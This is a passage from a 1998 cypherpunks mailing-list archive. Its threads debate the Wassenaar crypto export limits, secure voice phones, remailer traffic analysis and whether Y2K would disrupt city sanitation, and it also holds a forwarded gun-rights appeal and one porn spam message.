the session key. Even the dreaded rubber hose would fail. The startup
key protected the PK. The ultimate security was as good as the PK
portion. The conversation was practically pre-shredded.

I was bummed when I discovered this had already been patented and was
called EKE.

Does the Starium phone accomplish this effect?

Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 5 Dec 1998 09:17:23 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: y2k/gary north delusions (fwd)
Message-ID: <199812050109.TAA27156@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: Re: y2k/gary north delusions (fwd)
> Date: Fri, 4 Dec 1998 18:46:17 -0600 (CST)
> From: ichudov@Algebra.Com (Igor Chudov @ home)

> > Paris and London had populations of over a million each and didn't have a
> > sewer system. It was traditional for people to throw their chamber pots out
> > into the street along with the offal from the various animals.
> 
> Guess why they had those devastating epidemics.

True enough, but that sort of stuff takes more than a week or two. The
various cities could go around setting up port-a-potties and latrines in
parks with plastic liners for easy removal, etc.

It isn't nearly the civilization shaking event some would make of it.


    ____________________________________________________________________
 
             Technology cannot make us other than what we are.

                                           James P. Hogan

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Sat, 5 Dec 1998 09:50:53 +0800
To: ravage@EINSTEIN.ssz.com (Jim Choate)
Subject: Re: y2k/gary north delusions (fwd)
In-Reply-To: <199812050109.TAA27156@einstein.ssz.com>
Message-ID: <199812050121.TAA19903@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Jim Choate wrote:
> 
> 
> Forwarded message:
> 
> > Subject: Re: y2k/gary north delusions (fwd)
> > Date: Fri, 4 Dec 1998 18:46:17 -0600 (CST)
> > From: ichudov@Algebra.Com (Igor Chudov @ home)
> 
> > > Paris and London had populations of over a million each and didn't have a
> > > sewer system. It was traditional for people to throw their chamber pots out
> > > into the street along with the offal from the various animals.
> > 
> > Guess why they had those devastating epidemics.
> 
> True enough, but that sort of stuff takes more than a week or two. The
> various cities could go around setting up port-a-potties and latrines in
> parks with plastic liners for easy removal, etc.
> 
> It isn't nearly the civilization shaking event some would make of it.

Well, at least shitting is not going to be the hardest part of it.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Sat, 5 Dec 1998 09:52:15 +0800
To: nobody@replay.com (Anonymous)
Subject: Re: .
In-Reply-To: <199812050110.CAA14572@replay.com>
Message-ID: <199812050126.TAA19947@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Anonymous wrote:
> 
> 
> 
> ...
> > A few rules of thumb result from even cursory examination
> > of the likely environment:
> > 
> ...
> > 5. Ultimately, the only way the remailers will provide
> >    what might be described as Pretty Good Security will
> >    be when we have software that maintains a regular
> >    or random rate of messages to and from the remailer
> >    cloud, a stream into which the meaningful messages
> >    can be inserted with no visible change in traffic.
> >    Until then, the best we can do is try to keep traffic
> >    levels up, and to send and receive frequently enough
> >    to frustrate end-to-end traffic analysis.
> 
> Well, the existing remailer net doesn't make "Pretty Good" anonymity very
> feasible. I'd think something based on the general idea behind Crowds.
> 
> (Furthermore, most remailer structures still can't erase some other security
> concerns --
>   1: remailers acutally can be hacked or physically compromised
>   2: clients really can be screwed
>   3: etc.
> 
> To help solve the first, you'd want a two-box setup doing remailing, with the
> security-critical stuff loaded on a box not directly connected to the Net with
> something 140-1ish to make tampering harder, a secure OS, etc. -- or, of
> course, you can scrap all that to get really big remailer count.

As long as you do not see the box and do not control its manufacture,
I see no reason why you should have ny more trust in it.

igor

> To help solve the second problem, there needs to be a better web-of-trust 
> setup -- that is, one which applies to code as well as keys. Those who wish to
> verify code get a .sig-verifying program from a trusted source then use a WoT
> to authenticate various facets of the program necessary for security.
> 
> A solution to the third problem is expected RSN.)
> 
> > 
> > 6. Don't send anything that can have grave consequences.
> 
> Remember the consequences to an adversary who uses its secret decoder ring,
> though: the more plausible it becomes that a certain source is being used for
> intelligence-gathering, the more likely it is that that source will promptly
> begin to run dry as the spied-upon realize that Something Got Broke.  My
> advice, however, agrees with that of the other Anonymous. That is, unless
> you've really thought things out, think of an remailed message as merely
> .sigless, not anonymous.
> 
> > 
> > 7. Take names. Always take names. Some day...
> > 
> > FUDBusterMonger
> > 
> > It Ain't FUD til I SAY it's FUD!
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 5 Dec 1998 03:02:51 +0800
To: cypherpunks@cyberpass.net
Subject: export of printed crypto [Was Re:Wassenaar Statement]
Message-ID: <199812041827.TAA03335@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



The PGP source code is open, published in book form and
this gets stronger 1st amendment protection.

US crypto companies have also read the relevant portions
of the EAR. Yet, none, to my knowledge, have tried this.

Would any attorney reading the list care to comment?
The EAR clearly states that printed crypto is not subject
to the EAR whether the material is publically disseminated
or not.

Anyway, about one second after somebody did this another extra- 
constitutional "emergency" executive order would prohibit it.

 -Wassenaar

>In the United States, it is currently legal to export any cryptographic
>software you like - as long as it is in printed form.  This is because
>of fears of violating the First Amendment.  Not all countries have such
>strong conventions for protecting the printed word.

>PGP source code is being exported in printed form, scanned in overseas,


        




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@openpgp.net>
Date: Sat, 5 Dec 1998 10:26:24 +0800
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: y2k/gary north delusions (fwd)
In-Reply-To: <199812050109.TAA27156@einstein.ssz.com>
Message-ID: <199812050120.UAA006.51@whgiii>
MIME-Version: 1.0
Content-Type: text/plain



In <199812050109.TAA27156@einstein.ssz.com>, on 12/04/98 
   at 07:09 PM, Jim Choate <ravage@EINSTEIN.ssz.com> said:

>True enough, but that sort of stuff takes more than a week or two. The
>various cities could go around setting up port-a-potties and latrines in
>parks with plastic liners for easy removal, etc.

>It isn't nearly the civilization shaking event some would make of it.

I have never seen anything close to "civilization" in a major city. I
doubt anyone would notice the added stench if the sewers went out in one
of those cesspools.

-- 
---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
---------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michal Hohensee <mah248@nyu.edu>
Date: Sat, 5 Dec 1998 08:24:51 +0800
To: cypherpunks@cyberpass.net
Subject: Re: y2k/gary north delusions
In-Reply-To: <199812042048.OAA15267@manifold.algebra.com>
Message-ID: <36688ACA.C9F515B3@nyu.edu>
MIME-Version: 1.0
Content-Type: text/plain



Igor Chudov @ home wrote:
> 
> Petro wrote: 
> >       Ok, so let's cut that back to what we _need_. First off, we don't
> > dump our dish water down the drain, it gets "recycled" to flush the
> > toilets.
> 
> get them to shit outside.
> 

Bad bad bad bad bad bad *bad* idea.  This might be ok in the Russian
countryside, or any other countryside, but it an *excessively* bad thing
in just about any modern city.  If running water fails to run in the
cities, and people do as you suggest, and take their business outside,
it will not be long before tremendous numbers of people get sick and
die.  What with the high concentrations that people live in in most
cities, I expect that this'd make the Black Death look like a mild case
of the flu.

You cannot sustain a modern city without a working sewer system. 
Remember what cities were like in the middle ages?  I believe some
historians refer to them as "population sinks" for the surrounding
countryside.  Not for a lack of wealth or commerce, but for a lack of
sanitation.

Michael Hohensee




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 5 Dec 1998 13:10:30 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: y2k/gary north delusions (fwd)
Message-ID: <199812050458.WAA27935@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: Re: y2k/gary north delusions (fwd)
> Date: Fri, 4 Dec 1998 19:21:36 -0600 (CST)
> From: ichudov@Algebra.Com (Igor Chudov @ home)

> > True enough, but that sort of stuff takes more than a week or two. The
> > various cities could go around setting up port-a-potties and latrines in
> > parks with plastic liners for easy removal, etc.
> > 
> > It isn't nearly the civilization shaking event some would make of it.
> 
> Well, at least shitting is not going to be the hardest part of it.

True enough. Power, water, police, fire, etc. will come back pretty quickly
if anyone notices it was ever down. The really poor won't notice anything.
The most effected would be the wealthy. There will be outbreaks in Compton
and similar ilk but by no stretch of the imagination will it become a
conflagration. That's the beauty of an armed populace. Even if the police
don't respond it'll burn out as the front of rioters thin with increasing
radius and the odds go down.

I'd bet the delivery of foodstuffs to the store wouldn't slow down one bit.
It's possible to run a combine without the GPS. The trucks are driven by
people, they're loaded by fork-lifts. And you'll need to hunt long and hard
for a commercial freezer with a clock in it.

I've never seen a damn that didn't have manual gate controls so flood
control and hydro-electric will come back pretty quickly. The actual switch
control panel in power plants have manual over-rides everywhere. Ditto for
electric power grids.

Mass transportation like trains and aircraft will be effected. Individual
transportation like cars won't stop.

Inconvenient and expensive, you betcha. The decline of western civilization,
not hardly.


    ____________________________________________________________________
 
             Technology cannot make us other than what we are.

                                           James P. Hogan

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sat, 5 Dec 1998 15:17:37 +0800
To: cypherpunks@cyberpass.net
Subject: Re: What was the quid pro quo for Wassenaar countries?
In-Reply-To: <199812050240.SAA24692@toad.com>
Message-ID: <v0313032eb28e879c5ffe@[209.66.100.75]>
MIME-Version: 1.0
Content-Type: text/plain




(cryptography@c2.net removed from distribution list)


At 10:17 PM -0800 12/4/98, Lucky Green wrote:

>Ultimately, It won't make a difference, but sure, why not. Crypto regs can
>go one way, and one way only: more restrictive. See some 5 years of my
>postings on this topic. Lobbying and litigation can only delay the arrival
>of a total ban on general purpose strong crypto, not prevent it. Note that
>I am not at all claiming that either lobbying or litigation is useless. By
>all means, keep it up. It just won't change the fact that the ratchet
>turns only into one direction. Until the ratchet breaks, but that is
>another matter entirely and tends to be acompanied by lots of dead bodies.

Indeed. What more is there to say on this point? One way only. Even the "do
gooders" actually make things worse, by "greasing the skids" for
legislative talk and legislative "compromise"...said compromise always
being another turn of ratchet.

(This applies to many industries. I recently heard T.J. Rodgers, CEO of
Cypress Semiconductor, repeat his oft-made point that Silicon Valley and
the high tech industry gains _nothing_ by talking to Washington. That as
soon as dialog is started with Washington, things get worse. This applies
as well to crypto, to gun rights, to everything. Everything Washington
touches turns to statist shit.)


On another topic, what of the "free export of crypto" nations? Some
nations, or folks in some nations, like to talk about how they are actually
"more free" than Americans are because they can export strong crypto.
Canada comes to mind, as there are a couple of companies we know about
using the ostensibly weaker Canadian export controls.

(I maintain, and Lucky can be my witness that I expressed this forcefully
to some Canadian entrepreneurs very recently, that Canada's relative
laxness on crypto arises first, from their ignorance of the issues and
second, from the fact that Washington hasn't yet told them how high to
jump. I have long believed the U.S. would issue the orders and other
countries would turn out to be just as restrictive, if not more
restrictive, as they have fewer in-country protections against restrictions
on strong crypto. If Canada, Finland, etc. tighten up, can Anguilla be far
behind?)


>I doubt we will find out anytime soon. Favors? Blackmail? Most likely
>all of the above.

Or perhaps "strange fruit"? That is, hackers found hanging from a tree....

Or direct deposits to the Swiss bank accounts of Wassenaar delegates?

Or just intense lobbying, threats of foreign aid cutoffs, and repeated
showings of the "If you only knew what we know" videotape (specially
converted to PAL).

Nothing very surprising.

--Tim May

"I swear to tell the truth, the whole truth, just the way the President did."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 5 Dec 1998 13:22:16 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: the shit hitting the fan (fwd)
Message-ID: <199812050515.XAA28089@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sat, 5 Dec 1998 06:00:13 +0100
> From: Anonymous <nobody@replay.com>
> Subject: the shit hitting the fan

> At 02:48 PM 12/4/98 -0600, Igor Chudov @ home wrote:
> >Even flushing toilets is not necessary as anyone can shit outside.
> >
> >I am speaking out of personal experiences, living with water outages
> >while we were in the Russian countryside. It was no big deal, period.
> 
> Moron.  At a low population density you can do anything, burn wood, leaded
> gas,
> etc., no problem.
> 
> LA has 1e7 people who shit about a kilo per day.  Compute the volume of that
> after a week.

It's not the raw volume that's critical but rather the percentage of the
average personal space per inhabitant versus how much to store a weeks
worth. For the average person storing a weeks worth of solid waste in a
platic bag with bleach, lye, or similar material is reasonable.

I've gone on long duration camping trips of about a weeks length and the
storing and portage costs are not excessive (having a boat or horse helps
move it around).


    ____________________________________________________________________
 
             Technology cannot make us other than what we are.

                                           James P. Hogan

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Sat, 5 Dec 1998 16:00:58 +0800
To: Lucky Green <shamrock@cypherpunks.to>
Subject: Re: Which way are crypto regs going?
In-Reply-To: <Pine.BSF.3.96.981205065847.3124A-100000@pakastelohi.cypherpunks.to>
Message-ID: <199812050741.XAA26301@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



Lucky Green said:
> Ultimately, It won't make a difference, but sure, why not. Crypto regs can
> go one way, and one way only: more restrictive.

Lucky's such an optimist!  Actually, crypto regs have gone many
different directions.  The general direction in the US is toward
more openness.  (I've been watching them longer than Lucky has been.)

Authentication used to be licensed.  It isn't any more -- though
the bastards reserve the right to lie about what is authentication.

ATM machines used to require a license.

40-bit crypto used to require a license.

Financial institutions used to require licenses.

Big companies used to need licenses for intra-company use.

DES used to require a license.  (Still does, until the incredibly
cold warriors move their bowels and produce a new, uh, release
of the regs.)

Maybe sometime next year I'll be able to say, "Publishing crypto on
the net used to require a license but now it doesn't, since the courts
started enforcing the Constitution."  Whether this happens or not is
NOT under the control of the NSA -- I think.

On the other hand, crypto regs in other countries tended to start
from "unrestricted", so indeed there was no way they could go from there
except "more restrictive".  But after the first dollop of restriction,
they could go either way, as we've seen in various countries.
Germany for example seems to be loosening.  Canada turned out to be
looser than anyone had suspected, and is still trying to be loose
despite intense arm-twisting by US wiretappers.

Some countries actually seem to care what their citizens think about
their crypto laws, unlike the shining example of democracy, the USSA.
And when we educate the citizens, they tend to make the right choices.
Let's keep trying.

	John




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Sat, 5 Dec 1998 16:05:18 +0800
To: gtaylor@efa.org.au
Subject: Greg Taylor: preliminary Wassenaar details from three countries
Message-ID: <199812050742.XAA26319@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



[Greg graciously allowed me to repost this.   --gnu]

Date: Sat, 05 Dec 1998 15:22:53 +1000
From: Greg Taylor <gtaylor@efa.org.au>

Hi John,

You wrote:
>I have not found a single confirmation of the Aarons statement that
>the 33 Wassenaar countries have agreed to change the exemption for
>mass market crypto software.  (The NY Times and Reuters stories both
>quote Ambassador Aarons.)

I think Aarons must have an advanced degree in spin doctoring, but
nevertheless  information about new restrictions on mass market software
has also come from 3 independent well-placed sources.

>From the UK crypto list:
=================
Just talked to Dirk Weicke, Senior Adviser to Wassenaar Organisation.
Tel:+43 1 516360)

No written details will be issued until next week, but gist is:

*) No alteration to question of whether Wassenaar covers intangible exports.
Up to signatory states to interpret and legislate.

*) mass-market software, symmetric key length limited to 56-bits

*) software generally available, but with other restrictive tests on
end-user re-configurability, symmetric key length limited to 64-bits

*) Assymetric key lengths (not sure how relates to above) limited to:

RSA & Digital logarithm: 512 bits
Elliptic curve : 112 bits
=====================


And here's a view from David Jones (EFC), from the GILC list:

=====================
- There is "some relaxation" for restrictions on symmetric methods
  using key lengths of 56 bits or less.  Stronger crypto would require
  an export license.

- There is no restriction on mass-market software using symmetric methods
  and a key length of 64 bits or less.  Stronger mass-market crypto would
  require an export license.

- "Public Domain Software is not restricted"
  [If this is really true, this is still an important loophole.]

- There is not yet any clear information about the status of
  "intangible goods", like crypto software on a web site, or sent by email,
  as opposed to "tangible goods", like software on a floppy disk or CD-ROM.

- The restrictions on mass-market software greater than 64 bits is
  "for public safety" reasons and will last for 2 years,
  after which it will be reviewed.

=============================

Yesterday I got the Australian government interpretation from Robbie
Costmeyer in Canberra.  Costmeyer is the Defence bureaucrat responsible for
approving export licenses.  I was told that Wassenaar had now agreed that
the General Software Note  waiver no longer applied to Category 5/2 items
(i.e. crypto) on the controlled goods list.  It has always been the view of
Defence Signals Directorate here that it was an oversight that crypto
software came under the GSN.  That reason was used to justify Australia's
going one step further than required under the original Wassenaar
Arrangement and disallowing exemptions to the export licensing rules.  A
few other countries do the same (USA, New Zealand, France, Russia).
Canberra thus views the latest change as the correction of an oversight.
Clearly there is a difference of interpretation here regarding public
domain software (compare the Canadian view above).  This question needs
further investigation.

The Australian view is that the latest Wassenaar changes are a relaxation
of the previous rules.  And they're right, when compared with the previous
rules applying here.  Australia will now move to amend the Defence
Strategic Goods List (DSGL) to allow exemptions for small key lengths as
decribed above.

For other countries, the effects remain to be seen.  We'll just have to
wait for more information to filter out.

Greg




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phillip Hallam-Baker" <hallam@ai.mit.edu>
Date: Sat, 5 Dec 1998 13:36:01 +0800
To: <cryptography@c2.net>
Subject: RE: What was the quid pro quo for Wassenaar countries?
In-Reply-To: <v04020a00b28e65e25687@[139.167.130.246]>
Message-ID: <000e01be200d$d7be9e10$8007a8c0@russell.internal>
MIME-Version: 1.0
Content-Type: text/plain



John Gilmore may be right, but remember folks that in Europe we have this
thing the Greeks invented called democracy. One of the ideas of democracy
is that decisions are not made in secret closed meetings.

The interpretation of the US ambassador appears to be based on the
assumption
that the governmental proceedures of democratic countries are like those of
his home country. In fact European governments cannot make law simply by
telling the national police force to arrest folk who engage in particular
behaviour.

The system of checks and balances may be described in the US constitution
but it is entrenched in the European polity. The UK does not have a national
police force precisely to stop Hooverism.

Even directives of the European Commission do not have legal force until the
national parliaments enact legislation to implement the directive.

One should also remember that the government of the Netherlands has agreed
to control the sale and use of narcotics. If their efforts to control
cryptography are as dilligent we have nothing to worry about.

In addition under the single European act the entire country of Europe is
one export zone for crypto control purposes. I fail to see that stopping
Brits from exporting crypto to the US changes the equation a great deal.


There once was an English king called Canute who attempted to demonstrate
to his courtiers that he was fallible and could not order the tide to
turn. Perhaps Clinton's courtiers need to learn that they suffer the same
limmitation.

		Phill







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Sat, 5 Dec 1998 14:56:18 +0800
To: ravage@EINSTEIN.ssz.com (Jim Choate)
Subject: Re: y2k/gary north delusions (fwd)
In-Reply-To: <199812050458.WAA27935@einstein.ssz.com>
Message-ID: <199812050638.AAA00663@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Jim Choate wrote:
> Forwarded message:
> 
> > Subject: Re: y2k/gary north delusions (fwd)
> > Date: Fri, 4 Dec 1998 19:21:36 -0600 (CST)
> > From: ichudov@Algebra.Com (Igor Chudov @ home)
> 
> > > True enough, but that sort of stuff takes more than a week or two. The
> > > various cities could go around setting up port-a-potties and latrines in
> > > parks with plastic liners for easy removal, etc.
> > > 
> > > It isn't nearly the civilization shaking event some would make of it.
> > 
> > Well, at least shitting is not going to be the hardest part of it.
> 
> True enough. Power, water, police, fire, etc. will come back pretty quickly
> if anyone notices it was ever down. The really poor won't notice anything.
> The most effected would be the wealthy. There will be outbreaks in Compton
> and similar ilk but by no stretch of the imagination will it become a
> conflagration. That's the beauty of an armed populace. Even if the police
> don't respond it'll burn out as the front of rioters thin with increasing
> radius and the odds go down.
> 
> I'd bet the delivery of foodstuffs to the store wouldn't slow down one bit.
> It's possible to run a combine without the GPS. The trucks are driven by
> people, they're loaded by fork-lifts. And you'll need to hunt long and hard
> for a commercial freezer with a clock in it.
> 
> I've never seen a damn that didn't have manual gate controls so flood
> control and hydro-electric will come back pretty quickly. The actual switch
> control panel in power plants have manual over-rides everywhere. Ditto for
> electric power grids.
> 
> Mass transportation like trains and aircraft will be effected. Individual
> transportation like cars won't stop.
> 
> Inconvenient and expensive, you betcha. The decline of western civilization,
> not hardly.

It's a flexible society.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Sat, 5 Dec 1998 15:05:30 +0800
To: nobody@replay.com (Anonymous)
Subject: Re: the shit hitting the fan
In-Reply-To: <199812050500.GAA01545@replay.com>
Message-ID: <199812050639.AAA00677@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Anonymous wrote:
> At 02:48 PM 12/4/98 -0600, Igor Chudov @ home wrote:
> >Even flushing toilets is not necessary as anyone can shit outside.
> >
> >I am speaking out of personal experiences, living with water outages
> >while we were in the Russian countryside. It was no big deal, period.
> 
> Moron.  At a low population density you can do anything, burn wood, leaded
> gas,
> etc., no problem.
> 
> LA has 1e7 people who shit about a kilo per day.  Compute the volume of that
> after a week.

Dumbass, latrines solve this problem.

Computer your shit volume yourself.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Dupri <tdupri@hotmail.com>
Date: Sat, 5 Dec 1998 17:07:17 +0800
To: <cypherpunks@toad.com>
Subject: FREE WEEK XXX PORN SEX http://i.am/dupri
Message-ID: <419.436134.15638692tdupri@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain



PORN AT IT'S FINEST! YOUR SEARCH IS OVER! CLICK NOW FOR A FREE FREE 
FREE 
LIMITED TIME OFFER! ONE WEEK FREE! HURRY!
http://i.am/dupri
http://i.am/dupri




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Sat, 5 Dec 1998 08:21:40 +0800
To: Michael Motyka <mmotyka@lsil.com>
Subject: Re: Streams, Voice, and Sensitive Dependence
In-Reply-To: <36686876.1AF5@lsil.com>
Message-ID: <Pine.BSF.3.96.981205005936.571A-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain



http://www.starium.com

14.4 modem, awsome sound quality, 2048 bit DH, 3DES. Have one, love it.

--Lucky

On Fri, 4 Dec 1998, Michael Motyka wrote:

> 
> > It is my understanding that the PGP algorithm is primarily intended
> > as a block cypher.  Therefore, wouldn't an Outer Block stream cypher
> > be more effective for phone conversations?  Both solutions require 
> > hardware for a practical (tolerably noiseless) implementation, so 
> > there's nothing to be gained by streaming data into a block format.
> >
> Unless you have a really fast ( 1 Mbit / s? ) data connection you're
> going to want to do some voice compression. The algorithms I've seen
> break the audio into discrete time frames and (de)compress frame by
> frame. As a point of reference say about 16 bytes for every 33 msec of
> voice. Quality roughly follows data rate, of course. This makes a block
> cipher seem not so unreasonable.
> 
> Block cipher or stream cipher, either way you're going to have to
> introduce a latency of _at_least_ a couple of frames to allow for
> resends or deliberate out-of-order frame transmission. This makes the
> block cipher look like the better choice.
> 
> I think that using HW voice compression and a 33.6 modem you could get a
> full duplex secure conversation over POTS with a latency in the 0.1 -
> 0.3 second range and a direct cost in the vicinity of $100. With a
> reasonably quick microP any encryption method could probably be done as
> SW.
> 
> This is not a particularly difficult device to build. Any fine US
> citizens want to build some prototypes? 
> 
> Mike
> 
> 


-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Sat, 5 Dec 1998 14:49:43 +0800
To: "Cypherpunks" <Sporting.Shooters.Association@adelaide.on.net>
Subject: Fwd: Attn. INTERNATIONAL FIREARM COMMUNITY !
Message-ID: <199812050630.BAA02739@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain



==================BEGIN FORWARDED MESSAGE==================
>Date: Fri, 04 Dec 1998 22:35:56 -0800
>From: Donna Ferolie <donnaferolie@sympatico.ca>
>Subject: Attn. INTERNATIONAL FIREARM COMMUNITY !

This message has gone out to firearm owners all over the world as well on
the cdn-firearm chat and cdn-firearm digest.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ATTENTION INTERNATIONAL FIREARM COMMUNITY

This message is specifically dedicated to sport shooters from around the
globe. I would like to acknowledge our friends from the U.K, South Africa, Brazil, New
Zealand, Australia and the good old U.S.A. I have just sent out idividual
messages to all of these countries and some others including Germany, Belgium, Austria, Boliva,
Argentina, Aruba Slovakia and Barbados.  If your country has not been listed please
contact me directly. I am trying to develop a list of countries that are logging onto our open
firearms chat line. It is my goal to have firearm owners from every country monitoring and
sharing their experiences.

Please encourage fellow shooters in your country to come on line and
take advantage of this open forum. I fully realize that the primary focus of the Canadian
Firearms Chat Line is aimed at Canadian gun laws; however, there is a great deal of
pertinent international information that could be shared in this medium and we will all be the
beneficiaries if we willfully share our ideas and experiences.

I have another strategy up my sleeve regarding rallying the
international firearm community prior to the final outcome of the United Nations firearms
workshops in the year 2000; therefore it is paramount that we maintain frequent global
communications. I will be exploring some of my ideas with the NRA and the Sporting
Shooters Association of Australia in the new year and floating some draft strategies for open
discussion. 

Moreover, I fully intend on attending most of the United Nations firearm
workshops therefore having everyone connected to one open forum would assist
me in getting this information out all of you in a quick concise manner.

I've had a few myopic individuals ask me why I should be so concerned
about gun control in other countries ?  As far as I am concerned we should all be
concerned -VERY concerned ! When one of our sister countries falls we should all feel
their pain and learn something valuable, because we may be next. We cannot for a minute
forget about the draconian laws rammed down the throats of other Commonwealth countries
in particular or any free-thinking society. Can we really delude ourselves into
thinking that it couldn't happen here- don t kid yourself, as I write, the erosion of our rights
is going down the same path as Australians are treading, faster than we care to admit, and
we all should instinctively know it?  How would Canadians like to have all of their
semis and pump shotguns and rifles declared illegal and confiscated overnight by a
communist-leaning, bleeding heart liberal government- think about it !!

It is important for Canadians to realize that countries all over the
world feel no different that we do. They feel just as vulnerable and thus are seeking guidance
and support. We are in an excellent position to offer assistance to each other via this open
forum. I truly believe we can learn from each others  mistakes and triumphs. Perhaps if we can
tap into this universal intelligence on a continuous basis we could overtake the
mighty Goliath.

If time permits I would like to post the names of all anti-firearm NGO's
and their meetings which are going on simultaneously all over the world as we speak. I
think it is high time that we banded together as one solid global unit in an effort to
effectively launch a counter attack against those that take glee in the gradual
erosion of our civil rights and liberties.

A frequent complaint about this type of forum is the problem of
receiving an excessive number of messages, but I believe the rewards associated with this
hassle far out weigh the inconvenience. I care very much that our friends in South Africa are now
subject to new guns laws. I am sickened by what has transpired in Australia and the
U.K. I want the world to know how crime has escalated in Brazil and yet they live under
the most stringent gun control laws. As a point of interest the " boys from
Brazil " will be preparing a written paper outlining this very fact which I will present on their
behalf to the anti-gun Brazilian delegation at the next U.N workshop in Vienna in the latter
part of Jan/99.

In conclusion, if you are interested in banding together as one strong
universal voice, then get your friends connected to this open chat /and or digest.  Let us not
lose focus of our own battle at home, but let us not turn a blind eye to our global
neighbours  struggles.

I understand that English is a problem for some of you, but we are
understanding and we willing to work through any language barriers. So please do NOT feel
uncomfortable to communicate with us - we d love to hear what has transpired in your
country !

Remember, repeated blows to the lower extremities will eventually cause
the giant to fall !

You can subscribe to the Canadian Firearms Digest and the Firearms Chat
line by

1) Subcribe to the cdn chat & cdn digest  ( separately )

2) e-mailing the following address for both chat & digest:
<majordomo@sfn.saskatoon.sk.ca>

3) Leave the subject section   blank  

4) Write in the body of the message

subscribe cdn-firearm chat
end

subcribe cdn-firearm digest
end

Remember when you are subscribing to the chat is separate from the
digest.

Please feel free to contact me anytime at the following:

donnaferolie@sympatico.ca
Donna Ferolie


Keep up the fight!


Donna Ferolie
Canada


===================END FORWARDED MESSAGE===================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 5 Dec 1998 09:35:02 +0800
To: cypherpunks@toad.com
Subject: .
Message-ID: <199812050110.CAA14572@replay.com>
MIME-Version: 1.0
Content-Type: text/plain




...
> A few rules of thumb result from even cursory examination
> of the likely environment:
> 
...
> 5. Ultimately, the only way the remailers will provide
>    what might be described as Pretty Good Security will
>    be when we have software that maintains a regular
>    or random rate of messages to and from the remailer
>    cloud, a stream into which the meaningful messages
>    can be inserted with no visible change in traffic.
>    Until then, the best we can do is try to keep traffic
>    levels up, and to send and receive frequently enough
>    to frustrate end-to-end traffic analysis.

